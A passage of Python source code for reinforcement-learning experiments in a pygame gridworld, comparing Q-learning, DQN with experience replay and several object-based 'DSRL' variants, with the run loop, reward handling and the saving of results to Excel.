is a matrix, with possible fields not only for the action taken but also for the other possible actions. # The actions not take the same value as the prediction to not affect them targets = np.zeros((inputs.shape[0], num_actions)) # We draw states to learn from randomly for i, idx in enumerate(np.random.randint(0, len_memory, size=inputs.shape[0])): """ Here we load one transition <s, a, r, s’> from memory state_t: initial state s action_t: action taken a reward_t: reward earned r state_tp1: the state that followed s’ """ state_t, action_t, reward_t, state_tp1 = self.memory[idx][0] # We also need to know whether the game ended at this state game_over = self.memory[idx][1] inputs[i:i + 1] = state_t # First we fill the target values with the predictions of the model. # They will not be affected by training (since the training loss for them is 0) targets[i] = model.predict(state_t)[0] # print("targets\n", targets) # print("action_t", action_t) """ If the game ended, the expected reward Q(s,a) should be the final reward r. Otherwise the target value is r + gamma * max Q(s’,a’) """ # Here Q_sa is max_a'Q(s', a') Q_sa = np.max(model.predict(state_tp1)[0]) # if the game ended, the reward is the final reward if game_over: # if game_over is True targets[i, action_t] = reward_t else: # r + gamma * max Q(s’,a’) targets[i, action_t] = reward_t + self.discount * Q_sa return inputs, targets def define_optimizer(s_optimizer): lr = 0 beta_1 = 0 beta_2 = 0 epsilon = 0 decay = 0 rho = 0 if s_optimizer == "adam": lr = 0.001 # 0.001 beta_1 = 0.9 # 0.9 beta_2 = 0.999 # 0.999 epsilon = 1e-08 # 1e-08 decay = 0.0 # 0.0 optimizer_selected = keras.optimizers.Adam(lr=lr, beta_1=beta_1, beta_2=beta_2, epsilon=epsilon, decay=decay) elif s_optimizer == "rms_opt": lr = 0.001 # 0.001 rho = 0.9 # 0.9 epsilon = 1e-08 # e-08 decay = 0.0 # 0.0 optimizer_selected = keras.optimizers.RMSprop(lr=lr, rho=rho, epsilon=epsilon, decay=decay) optimizer_config = [lr, beta_1, beta_2, epsilon, decay, rho] return optimizer_selected, optimizer_config # def choose_action(s_alg, state, agent_pos, model, s_prob,step): # print("\nPREVIOUS MODEL - CHOOSE ACTION\n", model) zero = False if s_alg == "QL": state[agent_pos[1]][agent_pos[0]] = 120 s = str(state) if s not in model.index: indices = [np.array([s, s, s, s]), np.array(['up', 'down', 'right', 'left'])] df_zero = pd.DataFrame(np.zeros([4, 1]), index=indices) model = model.append(df_zero) model = model.fillna(0) n_action = np.argmax(model.loc[s][0]) # Choose the max argument if max(model.loc[s][0]) == 0: zero = True elif s_alg == "DSRL" or s_alg == "DSRL_dist" or s_alg == "DSRL_dist_type" or s_alg == "DSRL_dist_type_near" or s_alg == "DSRL_dist_type_near_propNeg" or s_alg == "DSRL_object_near" or s_alg == "DSRL_object": a_v_list = [] d = {} obj_list = create_obj_list(state) rel_list = relation_obj_list(obj_list, agent_pos) new_state = rel_list for obj in new_state: # FOR ALL OBJECTS SEEN tp_n_c = str(obj.tp) # GET THE TYPE FROM THE NEW STATE s_n_c = str(obj.loc) # GET THE LOCATION FROM THE NEW STATE if tp_n_c not in model.columns: # print("tp_n_c not in model.columns", tp_n_c) model[tp_n_c] = 0 if s_n_c not in model.index: # print("s_n_c not in model.index", s_n_c) m_index = pd.MultiIndex(levels=[[s_n_c], actions], labels=[[0, 0, 0, 0], [0, 1, 2, 3]], names=['state', 'actions']) df_zero = pd.DataFrame(index=m_index) model = model.append(df_zero) model = model.fillna(0) Qts_a = model[tp_n_c].loc[s_n_c] # print("Qts_a - ", Qts_a) global explore_dict if s_alg == "DSRL_dist_type_near" or s_alg == "DSRL_dist_type_near_propNeg" or s_alg == "DSRL_object_near": # Calculate the distance s_n_c_abs = [int(s) for s in s_n_c if s.isdigit()] # s_n_c_abs = state_new_absolute_distance distance = np.sqrt(s_n_c_abs[0]**2 + s_n_c_abs[1]**2) # print("distance",distance) Qts_a = Qts_a.divide(distance*distance, axis=0) a_v = [] for action, value in Qts_a.items(): pos_x = agent_pos[0] pos_y = agent_pos[1] if action == 'up': pos_y-=1 elif action =="down": pos_y+=1 elif action =="right": pos_x +=1 else: pos_x -=1 if (pos_x, pos_y) in explore_dict: a_v.append((action, value-0.1*explore_dict[(pos_x, pos_y)])) else: a_v.append((action, value)) # a_v = [(value, key) for value, key in Qts_a.items()] # print("Qts_a - NEW", Qts_a) a_v_list.append(a_v) # Append Q-value # print(a_v_list) # Sum the values of all Qs into a single Q for element in a_v_list: for a in element: act = a[0] # Action val = a[1] # Value d[act] = d.get(act, 0) + val # Sum values for each Q # print('a_v_list: (List of the action values for each object in the scene): ') # print('{0}'.format(a_v_list)) # print('\nd: (The sum of all object`s action values )') # pp.pprint(d) if d != {}: # BE CAREFUL THIS IS A DICT (argmax does not work as usual) inverse = [(value, key) for key, value in d.items()] # CALCULATE ALL KEYS n_action = max(inverse)[1] # Choose the max argument if max(d.values()) == 0: zero = True else: # n_action = "down" n_action = random.choice(actions) elif s_alg == "DQN": state[agent_pos[1]][agent_pos[0]] = 120 state = state.reshape((1, -1)) q = model.predict(state) n_act = np.argmax(q[0]) n_action = actions[n_act] if max(q[0]) == 0: zero = True x = random.random() # E greedy exploration # if x < s_prob: if step < 5 or x < s_prob: n_action = random.choice(actions) print_action = 'Random Act (Prob):' elif zero == True: # n_action = random.choice(actions) print_action = 'NOT Random Act (Zero):' pass else: print_action = 'Chosen Act:' # print("\nNEW MODEL - CHOOSE ACTION\n", model) # explore_set.add(tuple(agent_pos)) return n_action, model, print_action alfa = 1 # Learning Rate gamma = 0.9 # Temporal Discount Factor def learn(s_alg, model, state_t, state_t1, agent_t_pos, agent_t1_pos, reward, action_t, end_game, net_conf, exp_replay): # print("\nPREVIOUS MODEL - LEARN\n", model) batch_loss = 0 if s_alg == "QL": state_t[agent_t_pos[1]][agent_t_pos[0]] = 120 state_t1[agent_t1_pos[1]][agent_t1_pos[0]] = 120 s_t = str(state_t) s_t1 = str(state_t1) if s_t1 not in model.index: indices = [np.array([s_t1, s_t1, s_t1, s_t1]), np.array(['up', 'down', 'right', 'left'])] df_zero = pd.DataFrame(np.zeros([4, 1]), index=indices) model = model.append(df_zero) if s_t not in model.index: indices = [np.array([s_t, s_t, s_t, s_t]), np.array(['up', 'down', 'right', 'left'])] df_zero = pd.DataFrame(np.zeros([4, 1]), index=indices) model = model.append(df_zero) model = model.fillna(0) if end_game == False: max_value = max(model.loc[s_t1][0]) # max(df.loc[new_state][0]) Q_value = model.loc[s_t, action_t][0] updated_model = Q_value + alfa * (reward + (gamma * (max_value)) - Q_value) else: updated_model = reward model.loc[s_t, action_t] = updated_model elif s_alg == "DSRL" or s_alg == "DSRL_dist" or s_alg == "DSRL_dist_type" or s_alg == "DSRL_dist_type_near" or s_alg == "DSRL_dist_type_near_propNeg" or s_alg == "DSRL_object_near" or s_alg == "DSRL_object": max_value = 0 obj_list = create_obj_list(state_t) rel_list = relation_obj_list(obj_list, agent_t_pos) old_state = rel_list obj_list = create_obj_list(state_t1) rel_list = relation_obj_list(obj_list, agent_t1_pos) new_state = rel_list for i in range(len(old_state)): # Check all items in old state obj_prev = old_state[i] tp_prev = str(obj_prev.tp) s_prev = str(obj_prev.loc) # Check all items in new state obj_new = new_state[i] tp_new = str(obj_new.tp) s_new = str(obj_new.loc) if tp_new not in model.columns: # If type is new, then add type model[tp_new] = 0 if s_new not in model.index: # If state is new, then add state m_index = pd.MultiIndex(levels=[[s_new], actions], labels=[[0, 0, 0, 0], [0, 1, 2, 3]], names=['state', 'actions']) df_zero = pd.DataFrame(index=m_index) model = model.append(df_zero) model = model.fillna(0) max_value = max(model[tp_new].loc[s_new]) if s_alg == "DSRL": # THEY STILL HAVE THE PROBLEM OF NOT PROPAGATING THE NEGATIVE SIGNAL if end_game == False: Q_v = model[tp_prev].loc[s_prev, action_t] model[tp_prev].loc[s_prev, action_t] = Q_v + alfa * (reward + (gamma * max_value) - Q_v) else: model[tp_prev].loc[s_prev, action_t] = reward elif s_alg == "DSRL_dist": # THEY STILL HAVE THE PROBLEM OF NOT PROPAGATING THE NEGATIVE SIGNAL if reward != 0: s_p_c = [int(s) for s in s_prev if s.isdigit()] if s_p_c[0] < 2 and s_p_c[1] < 2: # EDITIONG DELETE if end_game == False: Q_v = model[tp_prev].loc[s_prev, action_t] model[tp_prev].loc[s_prev, action_t] = Q_v + alfa * (reward + (gamma * max_value) - Q_v) else: model[tp_prev].loc[s_prev, action_t] = reward else: if end_game == False: Q_v = model[tp_prev].loc[s_prev, action_t] model[tp_prev].loc[s_prev, action_t] = Q_v + alfa * (reward + (gamma * max_value) - Q_v) else: model[tp_prev].loc[s_prev, action_t] = reward elif s_alg == "DSRL_dist_type" or s_alg == "DSRL_dist_type_near": # THEY STILL HAVE THE PROBLEM OF NOT PROPAGATING THE NEGATIVE SIGNAL max_value_positive = max(model[tp_new].loc[s_new]) if reward != 0: s_p_c = [int(s) for s in s_prev if s.isdigit()] # s_p_c = state_previous_absolute_distance if s_p_c[0] < 2 and s_p_c[1] < 2: # IF IT IS CLOSE BY, THEN UPDATE ONLY THE CLOSE ONE: if reward < 0 and tp_new == "180": # IF REWARD IS NEGATIVE and NEW OBJECT IS NEGATIVE UPDATE ONLY NEGATIVE TYPE: if end_game == False: Q_v = model[tp_prev].loc[s_prev, action_t] model[tp_prev].loc[s_prev, action_t] = Q_v + alfa * (reward + (gamma * max_value_positive) - Q_v) else: model[tp_prev].loc[s_prev, action_t] = reward elif reward > 0 and tp_new == "60": # IF REWARD IS POSITIVE and NEW OBJECT IS POSITIVE UPDATE ONLY POSITIVE TYPE: if end_game == False: Q_v = model[tp_prev].loc[s_prev, action_t] model[tp_prev].loc[s_prev, action_t] = Q_v + alfa * (reward + (gamma * max_value_positive) - Q_v) else: model[tp_prev].loc[s_prev, action_t] = reward # IF reward is zero else: if end_game == False: Q_v = model[tp_prev].loc[s_prev, action_t] if tp_prev == "180": # IF THE PREVIOUS OBJECT WAS NEGATIVE model[tp_prev].loc[s_prev, action_t] = Q_v + alfa * (reward + (gamma * max_value_positive) - Q_v) elif tp_prev == "60": # IF THE PREVIOUS OBJECT WAS POSITIVE model[tp_prev].loc[s_prev, action_t] = Q_v + alfa * (reward + (gamma * max_value_positive) - Q_v) else: model[tp_prev].loc[s_prev, action_t] = reward elif s_alg == "DSRL_dist_type_near_propNeg": # I try to solve this with max and min, but it did not work very well(THEY STILL HAVE THE PROBLEM OF NOT PROPAGATING THE NEGATIVE SIGNAL) max_value_positive = max(model[tp_new].loc[s_new]) min_value_negative = min(model[tp_new].loc[s_new]) if reward != 0: s_p_c = [int(s) for s in s_prev if s.isdigit()] # s_p_c = state_previous_absolute_distance if s_p_c[0] < 2 and s_p_c[1] < 2: # IF IT IS CLOSE BY, THEN UPDATE ONLY THE CLOSE ONE: if reward < 0 and tp_new == "180": # IF REWARD IS NEGATIVE and NEW OBJECT IS NEGATIVE UPDATE ONLY NEGATIVE TYPE: if end_game == False: Q_v = model[tp_prev].loc[s_prev, action_t] model[tp_prev].loc[s_prev, action_t] = Q_v + alfa * (reward + (gamma * min_value_negative) - Q_v) else: model[tp_prev].loc[s_prev, action_t] = reward elif reward > 0 and tp_new == "60": # IF REWARD IS POSITIVE and NEW OBJECT IS POSITIVE UPDATE ONLY POSITIVE TYPE: if end_game == False: Q_v = model[tp_prev].loc[s_prev, action_t] model[tp_prev].loc[s_prev, action_t] = Q_v + alfa * (reward + (gamma * max_value_positive) - Q_v) else: model[tp_prev].loc[s_prev, action_t] = reward # IF reward is zero else: if end_game == False: Q_v = model[tp_prev].loc[s_prev, action_t] if tp_prev == "180": # IF THE PREVIOUS OBJECT WAS NEGATIVE model[tp_prev].loc[s_prev, action_t] = Q_v + alfa * (reward + (gamma * min_value_negative) - Q_v) elif tp_prev == "60": # IF THE PREVIOUS OBJECT WAS POSITIVE model[tp_prev].loc[s_prev, action_t] = Q_v + alfa * (reward + (gamma * max_value_positive) - Q_v) else: model[tp_prev].loc[s_prev, action_t] = reward elif s_alg == "DSRL_object_near" or s_alg == "DSRL_object": max_value_positive = max(model[tp_new].loc[s_new]) # Find the object that the agent interacted with: # This means that the agents has to know that the object which interacted with # After finding it, he has to assign the value to that object. # This means that I have to find the type and the state of this object that has now x=zero y=zero # print("obj_new.loc[0]\n", obj_new.loc[0]) # print("obj_new.loc[1]\n", obj_new.loc[1]) # print("action_t\n", action_t) # print("s_prev\n", s_prev) if obj_new.loc[0] == 0 and obj_new.loc[1] == 0: tp_to_update = tp_new # print("tp_new\n", tp_new) if action_t == "up": s_prev_to_update = str((0,1)) elif action_t == "down": s_prev_to_update = str((0,-1)) elif action_t == "right": s_prev_to_update = str((-1,0)) elif action_t == "left": s_prev_to_update = str((1,0)) # print("s_prev_to_update\n", s_prev_to_update) if end_game == False: Q_v = model[tp_to_update].loc[s_prev_to_update, action_t] model[tp_to_update].loc[s_prev_to_update, action_t] = Q_v + alfa * (reward + (gamma * max_value_positive) - Q_v) else: model[tp_to_update].loc[s_prev_to_update, action_t] = reward if reward == 0: if end_game == False: Q_v = model[tp_prev].loc[s_prev, action_t] model[tp_prev].loc[s_prev, action_t] = Q_v + alfa * (reward + (gamma * max_value_positive) - Q_v) else: model[tp_prev].loc[s_prev, action_t] = reward elif s_alg == "DQN": state_t[agent_t_pos[1]][agent_t_pos[0]] = 120 state_t1[agent_t1_pos[1]][agent_t1_pos[0]] = 120 state_t = state_t.reshape((1, -1)) state_t1 = state_t1.reshape((1, -1)) action_t = actions_dict[action_t] exp_replay.remember([state_t, action_t, reward, state_t1], end_game) # [old_state, old_action, reward, new_state] inputs, targets = exp_replay.get_batch(model, batch_size=net_conf["Batch_size"]) batch_loss = model.train_on_batch(inputs, targets) # print("\nNEW MODEL - LEARN\n", model) return model, batch_loss, exp_replay ''' PROGRAM START ''' __location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__))) def run(s_env, s_alg, s_learn, s_load, s_print, s_auto, s_episode, s_cond_to_end, s_server, s_net_comb_param, s_load_path, s_prob, s_sample, s_save): net_conf = {"N_actions": n_actions, "Max_memory": max_memory_list[s_net_comb_param], "Hidden_size": hidden_size_list[s_net_comb_param], "Batch_size": batch_size_list[s_net_comb_param], "Optimizer": optimizer_list[0]} exp_replay = ExperienceReplay(max_memory=net_conf["Max_memory"]) begin = time.time() begin_time = time.strftime('%X %x') print("\n\n --- BEGINING --- s_sample: %s \n begin_time: %s \n" % (s_sample, begin_time)) df_score = pd.DataFrame() df_percent_list = pd.DataFrame() df_loss_list = pd.DataFrame() df_time_sample = pd.DataFrame() avg_last_score_list = [] if s_server == False: screen = pygame.display.set_mode((400 + 37 * 5, 330 + 37 * 5)) score_list_best = [0] for sample in list(range(1, s_sample+1)): experiment_configurations = (sample, s_env, s_alg, s_episode, s_learn, s_load, s_print, s_auto, s_cond_to_end, s_server, s_net_comb_param, s_prob) print("\n - START - " "\n sample: %s" "\n s_env: %s" "\n s_alg: %s" "\n s_episode: %s" "\n s_learn: %s" "\n s_load: %s" "\n s_print: %s" "\n s_auto: %s" "\n s_cond_to_end: %s" "\n s_server: %s" "\n s_net_comb_param: %s" "\n s_prob: %s" % experiment_configurations) start = time.time() start_time = time.strftime('%X %x') print("\nStart time: ", start_time) negativo_list, positivo_list, agent, wall_list, h_max, v_max = environment_conf(s_env) env_dim = [h_max, v_max] # load file for transfer learning if s_load == True: try: model, op_conf = load_model(s_alg, __location__ + s_load_path) except Exception as e: print("DID NOT FIND THE FILE", __location__ + s_load_path, str(e)) else: model, op_conf = create_model(s_alg, env_dim, net_conf) # region INITIALIZE VARIABLES 1 percent_list = [] score = 0 score_list = [] episodes = 0 episodes_list = [] steps = 0 steps_list = [] batch_loss = 0 loss_list = [] # endregion # main component to an episode while (episodes < s_episode): # max_episodes negativo_list, positivo_list, agent, wall_list, h_max, v_max = environment_conf(s_env) # region INITIALIZE VARIABLES 2 episodes += 1 episodes_list.append(episodes) max_steps = 100 steps_list.append(steps) steps = 0 act_list = [] last_move = False action_chosen = "" encountered = 0 pos_collected = 0 prob = s_prob # endregion if s_server == False: # region DRAW SCREEN screen.fill(white) show_Alg(s_alg, screen) show_Samples(sample, screen) show_Level(episodes, screen) show_Score(score, screen) show_Steps(steps, screen) show_Percent(percent_list[-10:], screen) show_Steps_list(steps_list[-30:], screen) show_Act_List(act_list[-20:], screen) show_Action(action_chosen, screen) show_Env(s_env, screen) draw_objects(agent, positivo_list, negativo_list, wall_list, screen) pygame.display.flip() # endregion # main reinforcement learning part while (True): # max_steps or condition to finish sleep(speed) ''' EVENT HANDLE ''' key_pressed = False set_action = False while (s_server == False): for event in pygame.event.get(): # QUIT GAME if event.type == pygame.QUIT: pygame.quit() sys.exit() # ADD OR DELETE WALL if event.type == pygame.MOUSEBUTTONDOWN: pass # if (pygame.mouse.get_pressed() == (1, 0, 0)): # LEFT BUTTON (add wall) # pos = pygame.mouse.get_pos() # x = (pos[0] - x_g) / (m + w) # y = (pos[1] - y_g) / (m + h) # x = math.trunc(x) # y = math.trunc(y) # w_has = False # for item in wall_list: # if math.trunc((item[0] - x_g) / (m + w)) == x and math.trunc( # (item[1] - y_g) / (m + h)) == y: # w_has = True # if w_has == False: # wall = Class.Wall('wall', x, y) # print('wall ', wall, 'added') # wall_list.append(wall) # if (pygame.mouse.get_pressed() == (0, 0, 1)): # RIGHTBUTTON (delete wall) # pos = pygame.mouse.get_pos() # x = (pos[0] - x_g) / (m + w) # y = (pos[1] - y_g) / (m + h) # x = math.trunc(x) # y = math.trunc(y) # wall = Class.Wall('wall', x, y) # for i in wall_list: # if i == wall: # wall_list.remove(wall) # print('wall ', wall, 'removed') # EVENT - ANY PRESSED KEY # PRESS A KEY if event.type == pygame.KEYDOWN: # SAVE AND QUIT - KEY P if event.key == pygame.K_p: pygame.quit() sys.exit() # PLOT AGENT`S PERFORMENCE - KEY G if event.key == pygame.K_g: plt.plot(score_list) plt.ylabel('Score') plt.xlabel('Total Steps') plt.title('Performance of the Agent') plt.show() plt.plot(percent_list) plt.ylabel('Percentage of objects +') plt.xlabel('Total Steps') plt.title('Episode over 100 times step each') plt.show() if s_alg == "DQN": plt.plot(loss_list) plt.ylabel('loss') plt.xlabel('Total Steps') plt.title('batch_loss') plt.show() # MOVE - SPACE BAR if event.key == pygame.K_SPACE: key_pressed = True break # MOVE - ARROW KEYS if event.key in p_keys: key_pressed = True set_action = True if event.key == pygame.K_w: # North # add_act('↑') ⇦ ⇨ ⇧ ⇩ key_action = "up" if event.key == pygame.K_s: # South # add_act('↓') ⬅ ➡ ⬆ ⬇ key_action = "down" if event.key == pygame.K_d: # West # add_act('→') key_action = "right" if event.key == pygame.K_a: # East # add_act('←') key_action = "left" break # Run game if key is preseed or automatic is selected if key_pressed or s_auto: break # BREAK IF IT WAS THE LAST MOVE if last_move == True: break # RUN_GAME steps += 1 ''' OLD STATE - S 1 - 1''' state_t = update_state(h_max, v_max, agent, positivo_list, negativo_list, wall_list) agent_t = agent.pos ''' CHOOSE ACTION - AGENT ACT - 2''' action_chosen, model, print_action = choose_action(s_alg, state_t, agent_t, model, prob,steps) if set_action: action_chosen = key_action ''' CHANGE THE WORLD - UP_ENV - 3''' agent.try_move(action_chosen, wall_list) act_list.append(action_chosen) # if s_print: print(print_action, action_chosen) ''' NEW STATE - S2 - 4''' state_t1 = update_state(h_max, v_max, agent, positivo_list, negativo_list, wall_list) agent_t1 = agent.pos global explore_set global explore_dict if s_print: # print('\n>>>> Level: ' + str(episodes) + ' | Step: ' + str( # steps) + ' | New_agent_pos: ' + str(agent.pos) + ' <<<<') pos_tuple = tuple(agent.pos) explore_set.add(pos_tuple) if pos_tuple not in explore_dict: explore_dict[pos_tuple] = 1 else: explore_dict[pos_tuple] += 1 if steps==max_steps: print("Number of explore node: "+str(len(explore_set))) print("Explored Node postion: "+str(explore_dict)) explore_set = set() explore_dict = dict() ''' GET REWARD - 5 ''' # region GET REWARD AND DELETE COLLECTED OBJECT prev_score = score score += step_reward for positivo in positivo_list: if agent.pos == positivo.pos: encountered += 1 pos_collected += 1 score += positive_reward positivo = Class.Positivo('positivo', agent.pos[0], agent.pos[1]) positivo_list.remove(positivo) # if s_print == True and s_server == False: # print(' Hit the Positivo') for negativo in negativo_list: if agent.pos == negativo.pos: encountered += 1 score -= negative_reward negativo = Class.Negativo('negativo', agent.pos[0], agent.pos[1]) negativo_list.remove(negativo) # if s_print == True and s_server == False: # print(' Hit the Negativo') new_score = score score_list.append(score) reward = new_score - prev_score # endregion ''' LEARN - 6 ''' # CONDITION TO FINISH THE Episode if s_cond_to_end == 'max_steps': if steps == max_steps: last_move = True elif s_cond_to_end == 'coll_all' or steps > max_steps: if len(positivo_list) == 0 and len(negativo_list) == 0 or steps > max_steps: last_move = True elif s_cond_to_end == 'only_positive' or steps > max_steps: if len(positivo_list) == 0 or steps > max_steps: last_move = True elif s_cond_to_end == 'only_negative' or steps > max_steps: if len(negativo_list) == 0 or steps > max_steps: last_move = True # LEARN if s_learn == True: action_t = action_chosen if last_move == False: ''' LEARN ''' model, batch_loss, exp_replay = learn(s_alg, model, state_t, state_t1, agent_t, agent_t1, reward, action_t, False, net_conf, exp_replay) else: ''' LEARN FINAL ''' model, batch_loss, exp_replay = learn(s_alg, model, state_t, state_t1, agent_t, agent_t1, reward, action_t, True, net_conf, exp_replay) if s_server == False: # region DRAW SCREEN screen.fill(white) show_Alg(s_alg, screen) show_Samples(sample, screen) show_Level(episodes, screen) show_Score(score, screen) show_Steps(steps, screen) show_Percent(percent_list[-10:], screen) show_Steps_list(steps_list[-30:], screen) show_Act_List(act_list[-20:], screen) show_Action(action_chosen, screen) show_Env(s_env, screen) draw_objects(agent, positivo_list, negativo_list, wall_list, screen) pygame.display.flip() # endregion try: percent = pos_collected / encountered except ZeroDivisionError: percent = 0 percent_list.append(percent) loss_list.append(batch_loss) print("Episode: ", episodes) # region TIME 1 print("Start time: ", start_time) end = time.time() end_time = time.strftime('%X %x') print("End time: ", end_time) time_elapsed = end - start print("Time elapsed: ", time_elapsed) # endregion '''GET THE BEST MODEL''' if max(score_list) > max(score_list_best): best_model = model score_list_best = score_list # region MAKE LIST OF THE RESULTS avg_last_score_list.append(score_list[-1]) score_list_df = pd.DataFrame({'Score': score_list}) percent_list_df = pd.DataFrame({'Percent': percent_list}) loss_list_df = pd.DataFrame({'Batch_loss': loss_list}) time_sample_df = pd.DataFrame({'Time': [time_elapsed]}) df_score = pd.concat([df_score, score_list_df], ignore_index=True, axis=1) df_percent_list = pd.concat([df_percent_list, percent_list_df], ignore_index=True, axis=1) df_loss_list = pd.concat([df_loss_list, loss_list_df], ignore_index=True, axis=1) df_time_sample = pd.concat([df_time_sample, time_sample_df], ignore_index=True, axis=1) # endregion if s_save == True: # region PATH TO SAVE save_path_core = __location__ + "/Results/" if s_learn == True: save_path = save_path_core + "Train/Env_" + str(s_env) + "/Train_Env_" + str(s_env) + "_" + s_alg else: save_path = save_path_core + "Test/Env_" + str(s_env) + "/Test_Env_" + str(s_env) + "_" + s_alg if s_alg == "DQN": save_path += "_" + str(s_net_comb_param) # convert begin_time to string and format it time_path = begin_time.replace(" ", " ") time_path = time_path.replace(":", " ") time_path = time_path.replace("/", "-") # append to the save path save_path = save_path + " " + time_path if s_load == True: load_path = " loaded_with " + s_load_path.replace("/", "_") save_path = save_path + load_path # If it doesnt find the path, then create a new path if not os.path.exists(os.path.dirname(save_path)): try: os.makedirs(os.path.dirname(save_path)) except OSError as exc: # Guard against race condition print("ERROR when saving the File") # endregion print("save_path: ", save_path) # region SAVE ALL # IF IT IS NOT DQN NULL NET CONF. VALUES if s_alg != "DQN": op_conf = [0, 0, 0, 0, 0, 0] net_conf = {"N_actions":0, "Max_memory":0, "Hidden_size":0, "Batch_size":0, "Optimizer":"none"} avg_last_score = np.average(avg_last_score_list) config_list = pd.concat([pd.Series({'Run_Conf': "A"}), pd.Series({'Env_conf': s_env}), pd.Series({'Algort': s_alg}), pd.Series({'Learn': s_learn}), pd.Series({'Load': s_load}), pd.Series({'Samples': s_sample}), pd.Series({'Episode': s_episode}), pd.Series({'Max_steps': max_steps}), pd.Series({'s_cond_to_end': s_cond_to_end}), pd.Series({'Auto': s_auto}), pd.Series({'Server': s_server}), pd.Series({'Print': s_print}), pd.Series({'MODEL CONF': ""}), pd.Series({'alfa': alfa}), pd.Series({'gamma': gamma}), pd.Series({'Prob': Prob}), pd.Series({'N_actions': net_conf["N_actions"]}), pd.Series({'Max_memory': net_conf["Max_memory"]}), pd.Series({'Hidden_size': net_conf["Hidden_size"]}), pd.Series({'Batch_size': net_conf["Batch_size"]}), pd.Series({'Optimizer': net_conf["Optimizer"]}), pd.Series({'lr': op_conf[0]}), pd.Series({'beta_1': op_conf[1]}), pd.Series({'beta_2': op_conf[2]}), pd.Series({'epsilon': op_conf[3]}), pd.Series({'decay': op_conf[4]}), pd.Series({'rho': op_conf[5]}), pd.Series({'': ""}), pd.Series({'AVG SCORE': avg_last_score})]) config_list = config_list.to_frame() if s_print: print("\nconfig_list:\n", config_list) # Create a Pandas Excel writer using XlsxWriter as the engine. writer = pd.ExcelWriter(save_path + ".xlsx", engine='xlsxwriter') # SAVING CONFIG: config_list.to_excel(writer, sheet_name='Run_Conf', header=False) worksheet = writer.sheets['Run_Conf'] worksheet.set_column('A:B', 15) # SAVING SCORE: df_score_mean = df_score.mean(axis=1) df_score.insert(0, "Avg " + str(s_sample), df_score_mean) df_score.to_excel(writer, sheet_name='Score') worksheet = writer.sheets['Score'] worksheet.write(0, 0, "Score") # SAVING PERCENT: df_percent_list_mean = df_percent_list.mean(axis=1) df_percent_list.insert(0, "Avg " + str(s_sample), df_percent_list_mean) df_percent_list.to_excel(writer, sheet_name='Percent') worksheet = writer.sheets['Percent'] worksheet.write(0, 0, "Percent") # SAVING LOSS: df_loss_list.to_excel(writer, sheet_name='Loss') worksheet = writer.sheets['Loss'] worksheet.write(0, 0, "Loss") # SAVING TIME: df_time_sample.to_excel(writer, sheet_name='Time') worksheet = writer.sheets['Time'] worksheet.write(0, 0, "Time") # region CELL SIZE # worksheet = writer.sheets['Score'] # worksheet.set_column('A:B', 15) # worksheet = writer.sheets['Time'] # worksheet.set_column('A:B', 15) # endregion # SAVING BEST MODEL (out of # Samples): if s_alg == "DSRL" or s_alg == "QL" or s_alg == "DSRL_dist" or s_alg == "DSRL_dist_type" or s_alg == "DSRL_dist_type_near" or s_alg == "DSRL_dist_type_near_propNeg" or s_alg == "DSRL_object_near" or s_alg == "DSRL_object": # SAVING MODEL CONFIGURATIONS: best_model.to_excel(writer, sheet_name='model') # CONDITIONAL COLOR worksheet = writer.sheets['model'] for x in range(2, 700, 4): cell = "C" + str(x) + ":D" + str(x + 3) worksheet.conditional_format(cell, {'type': '3_color_scale'}) # CELL SIZE worksheet = writer.sheets['model'] worksheet.set_column('A:A', 50) # region ADD PLOTS # worksheet = writer.sheets['results'] # workbook = writer.book # chart = workbook.add_chart({'type': 'line'}) # chart2 = workbook.add_chart({'type': 'line'}) # chart.add_series({'values': '=results!$B$2:$B$100'}) # chart2.add_series({'values': '=results!$C$2:$C$10'}) # worksheet.insert_chart('F3', chart) # worksheet.insert_chart('N3', chart2) # SAVE DQN MODEL if s_learn == True and s_alg == "DQN": save_model(best_model, save_path) writer.save() # endregion print("\n - END - " "\n sample: %s" "\n s_env: %s" "\n s_alg: %s" "\n s_episode: %s" "\n s_learn: %s" "\n s_load: %s" "\n s_print: %s" "\n s_auto: %s" "\n s_cond_to_end: %s" "\n s_server: %s" "\n s_net_comb_param: %s" "\n s_prob: %s" % experiment_configurations) # region TIME 2 print("\n\nBegin time: ", begin_time) finish = time.time() finish_time = time.strftime('%X %x') print("Final time: ", finish_time) total_time = finish - begin print("Total time: ", total_time) # endregion return # -------------------------------------------------------------------------------------------------- # ''' SELECT PARAMETERS TO RUN THE SOFTWARE ''' # environment configuration Env = 11 Alg_list = ["QL", "DSRL", "DSRL_object_near", "DQN", "DSRL_dist", "DSRL_dist_type", "DSRL_dist_type_near", "DSRL_dist_type_near_propNeg", "DSRL_object"] Alg = Alg_list[2] # Select the algorithm to be used Learn = False # To update its knowledge Load = True # To load a learned model Load_path = "/Results/Train/Env_11/Train_Env_11_DSRL 02 41 20 05-05-21" # algorithm configuration Samples = 2 # Usually 10 samples (repeat 100 episodes for 10 times) Print = True # Print some info in the terminal Auto = True # Agent moves Automatic or if False it moves by pressing the Spacebar key Server = False # If running in the server since # change Prob to 1 for probe training?? Prob = 0.3 # Probability to make a random move (exploration rate) Cond_to_end = "max_steps" # Choose from below (there are 4) Save = False # Save the model speed = 0.05 # seconds per frame # Cond_to_end = "max_steps" # Cond_to_end = "coll_all" # Cond_to_end = "only_negative" Episodes = 500 # Usually 1000 or 100 # region DQN Model Configurations: # max_memory_list = [5, 5, 5, 30, 30, 30, 100, 100, 100] # hidden_size_list = [5, 30, 270, 5, 30, 270, 5, 30, 270] # batch_size_list = [1, 1, 1, 10, 10, 10, 32, 32, 32] max_memory_list = [100, 100, 100, 300, 300, 300, 900, 900, 900] hidden_size_list = [5, 10, 15, 5, 10, 15, 5, 10, 15] batch_size_list = [32, 32, 32, 32, 32, 32, 32, 32, 32] optimizer_list = ["adam", "rms_opt"] n_actions = 4 # [move_up, move_down, move_left, move_right] # endregion Net_comb_param = 4 # ------------------------------------------------------------------------------------------- # run(Env, Alg, Learn, Load, Print, Auto, Episodes, Cond_to_end, Server, Net_comb_param, Load_path, Prob, Samples, Save) # ------------------------------------------------------------------------------------------- # ''' REPEAT DQN Net_Comb_Param ''' # for i in range(9): # Net_comb_param = i # run(Env, Alg, Learn, Load, Print, Auto, Episodes, Cond_to_end, Server, Net_comb_param, Load_path, Prob, Samples, Save) ''' REPEAT Alg for a list of Env ''' # env_list = [2,3] # for Env in env_list: # run(Env, Alg, Learn, Load, Print, Auto, Episodes, Cond_to_end, Server, Net_comb_param, Load_path, Prob, Samples, Save) ''' Alg_list for Env_list ''' # 